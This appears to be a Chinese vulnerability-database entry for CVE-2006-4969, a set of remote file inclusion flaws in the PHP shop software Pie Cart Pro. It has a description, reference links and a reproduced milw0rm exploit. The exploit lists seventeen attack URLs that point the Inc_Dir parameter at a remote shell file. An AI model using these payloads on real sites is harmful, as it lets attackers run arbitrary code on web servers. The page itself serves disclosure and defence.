WAHM E-Commerce Pie Cart Pro 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111081 漏洞类型 输入验证
发布时间 2006-09-19 更新时间 2006-09-27
CVE编号 CVE-2006-4969 CNNVD-ID CNNVD-200609-414
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2393
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-414
|漏洞详情
WAHME-CommercePieCartPro中存在多个PHP远程文件包含漏洞,远程攻击者可以通过以下文件的Inc_Dir参数中的URL执行任意PHP代码:(1)affiliates.php,(2)orders.php,(3)events.php,(4)index.php,(5)articles.php,(6)faqs.php,(7)guestbook.php,(8)catalog.php,(9)wholesale.php,(10)weblinks.php,(11)certificates.php,(12)sitesearch.php,(13)contact.php,(14)sitemap.php,(15)search.php,(16)registry.php或(17)error.php。
|漏洞EXP
#====================================================================
# Pie Cart Pro => (Inc_Dir) Remote File Inclusion Exploit
#====================================================================
#
#Critical Level : Dangerous
#
#By SnIpEr_SA
#
#http://www.doodlebabies.com/
#
#=================================================================
#
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://site.com/[path]/affiliates.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/orders.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/events.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/index.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/articles.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/faqs.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/guestbook.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/catalog.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/wholesale.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/weblinks.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/certificates.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/sitesearch.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/contact.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/sitemap.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/search.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/registry.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/error.php?Inc_Dir=http://shell.com/shell.txt?
#
#==============================================================================
#Discoverd By : SnIpEr_SA
#
#Conatact : SnIpEr.SA[at]hotmail.com
#
#GreetZ : SaUdi HaCkRz , Devil-x , shereba, BlacK-Code, KILLERxXx ,Qptan,red devil , mazagi,Mohajer And All My Frind
#http://www.elite-team.cc/vb , www.3asfh.net ,www.lezr.com
============================================================================#

# milw0rm.com [2006-09-19]
|参考资料

来源:XF
名称:piecartpro-incdir-file-include(29023)
链接:http://xforce.iss.net/xforce/xfdb/29023
来源:BID
名称:20099
链接:http://www.securityfocus.com/bid/20099
来源:MILW0RM
名称:2393
链接:http://www.milw0rm.com/exploits/2393
来源:OSVDB
名称:29214
链接:http://www.osvdb.org/29214
来源:OSVDB
名称:29213
链接:http://www.osvdb.org/29213
来源:OSVDB
名称:29212
链接:http://www.osvdb.org/29212
来源:OSVDB
名称:29211
链接:http://www.osvdb.org/29211
来源:OSVDB
名称:29210
链接:http://www.osvdb.org/29210
来源:OSVDB
名称:29209
链接:http://www.osvdb.org/29209
来源:OSVDB
名称:29208
链接:http://www.osvdb.org/29208
来源:OSVDB
名称:29207
链接:http://www.osvdb.org/29207
来源:OSVDB
名称:29206
链接:http://www.osvdb.org/29206
来源:OSVDB
名称:29205
链接:http://www.osvdb.org/29205
来源:OSVDB
名称:29204
链接:http://www.osvdb.org/29204
来源:OSVDB
名称:29203
链接:http://www.osvdb.org/29203
来源:OSVDB
名称:29202
链接:http://www.osvdb.org/29202
来源:OSVDB
名称:29201
链接:http://www.osvdb.org/29201
来源:OSVDB
名称:29200
链接:http://www.osvdb.org/29200
来源:OSVDB
名称:29199
链接:http://www.osvdb.org/29199
来源:OSVDB
名称:29198
链接:htt